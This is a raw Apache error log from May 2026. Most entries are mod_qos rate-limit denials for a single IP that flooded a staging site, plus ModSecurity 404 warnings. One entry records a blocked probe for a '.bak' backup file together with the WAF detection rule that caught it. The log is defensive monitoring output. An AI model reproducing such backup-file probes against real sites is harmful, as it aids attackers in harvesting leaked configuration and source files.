[Tue May 26 19:54:49.768080 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25L6wAAAaI
[Tue May 26 19:54:49.768498 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGrgAAALw
[Tue May 26 19:54:49.769152 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGsAAAAMg
[Tue May 26 19:54:49.776063 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGsQAAAIg
[Tue May 26 19:54:49.892339 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTvgAAACg
[Tue May 26 19:54:49.905174 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGswAAAMo
[Tue May 26 19:54:49.905182 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGsgAAAMI
[Tue May 26 19:54:49.916751 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25L7AAAAco
[Tue May 26 19:54:49.918513 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTvwAAAD4
[Tue May 26 19:54:49.919121 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGtAAAAPA
[Tue May 26 19:54:49.934192 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25L7QAAAfE
[Tue May 26 19:54:49.943415 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGtwAAAIY
[Tue May 26 19:54:49.944873 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGuAAAAPU
[Tue May 26 19:54:49.952175 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGuQAAAMU
[Tue May 26 19:54:50.041242 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMmDRMqfxdEDkoszTwgAAAHc
[Tue May 26 19:54:50.057569 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGugAAAJ4
[Tue May 26 19:54:50.058261 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGuwAAAOQ
[Tue May 26 19:54:50.065075 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25L7wAAAZU
[Tue May 26 19:54:50.066836 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMmDRMqfxdEDkoszTwwAAACw
[Tue May 26 19:54:50.070399 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGvQAAAIc
[Tue May 26 19:54:50.088708 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25L8AAAAZM
[Tue May 26 19:54:50.092933 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGvwAAAME
[Tue May 26 19:54:50.095797 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGwAAAAJs
[Tue May 26 19:54:50.115567 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGwQAAAIU
[Tue May 26 19:54:50.208377 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGxQAAAKw
[Tue May 26 19:54:50.208457 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGxgAAANA
[Tue May 26 19:54:50.215325 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25L8QAAAcM
[Tue May 26 19:54:50.215328 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtMmDRMqfxdEDkoszTxQAAAEs
[Tue May 26 19:54:50.219780 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGxwAAAPk
[Tue May 26 19:54:50.241587 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25L8gAAAdM
[Tue May 26 19:54:50.242488 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGyAAAAOc
[Tue May 26 19:54:50.249039 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGyQAAALw
[Tue May 26 19:54:50.271650 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LGygAAAMg
[Tue May 26 19:54:50.278311 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGFgAAAMw"]
[Tue May 26 19:54:50.280976 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMEqK9k_ZUB2Vp25LqQAAAaU"]
[Tue May 26 19:54:50.286541 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGJgAAAPc"]
[Tue May 26 19:54:50.288140 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGIwAAAJk"]
[Tue May 26 19:54:50.296011 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGKQAAAPo"]
[Tue May 26 19:54:50.297340 2026] [security2:error] [pid 86490:tid 86713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGIAAAAOI"]
[Tue May 26 19:54:50.304559 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGHwAAAKo"]
[Tue May 26 19:54:50.304708 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGOAAAAI0"]
[Tue May 26 19:54:50.309907 2026] [security2:error] [pid 86490:tid 86651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGNwAAAKQ"]
[Tue May 26 19:54:50.319458 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGNQAAAQI"]
[Tue May 26 19:54:50.322168 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGLQAAAQQ"]
[Tue May 26 19:54:50.328920 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMGDRMqfxdEDkoszTlAAAAAE"]
[Tue May 26 19:54:50.330111 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25LyQAAAfg"]
[Tue May 26 19:54:50.334339 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGFAAAAO4"]
[Tue May 26 19:54:50.334888 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMGDRMqfxdEDkoszTkgAAABk"]
[Tue May 26 19:54:50.339547 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMEqK9k_ZUB2Vp25LugAAAbI"]
[Tue May 26 19:54:50.341649 2026] [security2:error] [pid 86490:tid 86690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGLgAAAMs"]
[Tue May 26 19:54:50.350401 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTpQAAADA"]
[Tue May 26 19:54:50.372719 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGiAAAAOM"]
[Tue May 26 19:54:50.376552 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25LxwAAAd0"]
[Tue May 26 19:54:50.383305 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25LygAAAcQ"]
[Tue May 26 19:54:50.417608 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTqwAAAHw"]
[Tue May 26 19:54:50.418103 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTrQAAAG4"]
[Tue May 26 19:54:50.420446 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTrgAAACA"]
[Tue May 26 19:54:50.427666 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTpAAAAEM"]
[Tue May 26 19:54:50.428055 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25LzwAAAgM"]
[Tue May 26 19:54:50.434672 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGkQAAALY"]
[Tue May 26 19:54:50.438598 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L4gAAAcw"]
[Tue May 26 19:54:50.441508 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTqgAAAGQ"]
[Tue May 26 19:54:50.443490 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L2AAAAgY"]
[Tue May 26 19:54:50.443933 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGfwAAAOw"]
[Tue May 26 19:54:50.446696 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGjwAAALA"]
[Tue May 26 19:54:50.447929 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTqQAAAEE"]
[Tue May 26 19:54:50.593783 2026] [qos:error] [pid 93868:tid 94384] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MDAAAAg0
[Tue May 26 19:54:50.594640 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MDQAAAbk
[Tue May 26 19:54:50.595005 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHCgAAAOE
[Tue May 26 19:54:50.596445 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMmDRMqfxdEDkoszT3gAAAEg
[Tue May 26 19:54:50.599011 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHDwAAAJ0
[Tue May 26 19:54:50.600217 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHEAAAAQA
[Tue May 26 19:54:50.600315 2026] [qos:error] [pid 93868:tid 94325] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MDgAAAdI
[Tue May 26 19:54:50.611369 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMkqK9k_ZUB2Vp25MDwAAAeo
[Tue May 26 19:54:50.613248 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMkqK9k_ZUB2Vp25MEAAAAZ8
[Tue May 26 19:54:50.613668 2026] [qos:error] [pid 93868:tid 94348] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMkqK9k_ZUB2Vp25MEQAAAek
[Tue May 26 19:54:50.613805 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMlZMwN0DpLVWo6LHEQAAAL4
[Tue May 26 19:54:50.750180 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHFAAAAM0
[Tue May 26 19:54:50.750693 2026] [qos:error] [pid 93868:tid 94298] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MFgAAAbc
[Tue May 26 19:54:50.750697 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtMmDRMqfxdEDkoszT4gAAABQ
[Tue May 26 19:54:50.752446 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MFwAAAe4
[Tue May 26 19:54:50.753606 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHFQAAAJ8
[Tue May 26 19:54:50.757321 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMkqK9k_ZUB2Vp25MGAAAAaw
[Tue May 26 19:54:50.757633 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMkqK9k_ZUB2Vp25MGQAAAac
[Tue May 26 19:54:50.766686 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHFwAAANE
[Tue May 26 19:54:50.767807 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHGAAAAN4
[Tue May 26 19:54:50.769234 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMlZMwN0DpLVWo6LHGQAAALM
[Tue May 26 19:54:50.777910 2026] [security2:error] [pid 93576:tid 93799] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/postcss.config.mjs.bak"] [unique_id "ahWtMmDRMqfxdEDkoszT5AAAAFc"]
[Tue May 26 19:54:50.903261 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHGwAAAM8
[Tue May 26 19:54:50.904486 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MHQAAAfI
[Tue May 26 19:54:50.905310 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMmDRMqfxdEDkoszT5QAAACU
[Tue May 26 19:54:50.905597 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MHgAAAaI
[Tue May 26 19:54:50.907317 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHHAAAAMQ
